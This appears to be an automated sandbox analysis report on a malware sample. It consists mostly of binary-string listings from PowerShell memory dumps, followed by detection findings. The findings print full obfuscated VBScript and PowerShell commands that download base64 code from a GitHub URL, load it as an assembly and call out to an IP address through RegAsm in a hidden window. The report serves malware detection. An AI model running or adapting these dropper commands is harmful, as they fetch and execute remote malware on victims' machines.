Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2203709649.0000022A9B807000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000003.00000002.2211606771.00007FFD9BC50000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000003.00000002.2203709649.0000022A9B821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000003.00000002.2203709649.0000022A9B821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M", "0", "false");
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Obfuscated command line found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')"Jump to behavior
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0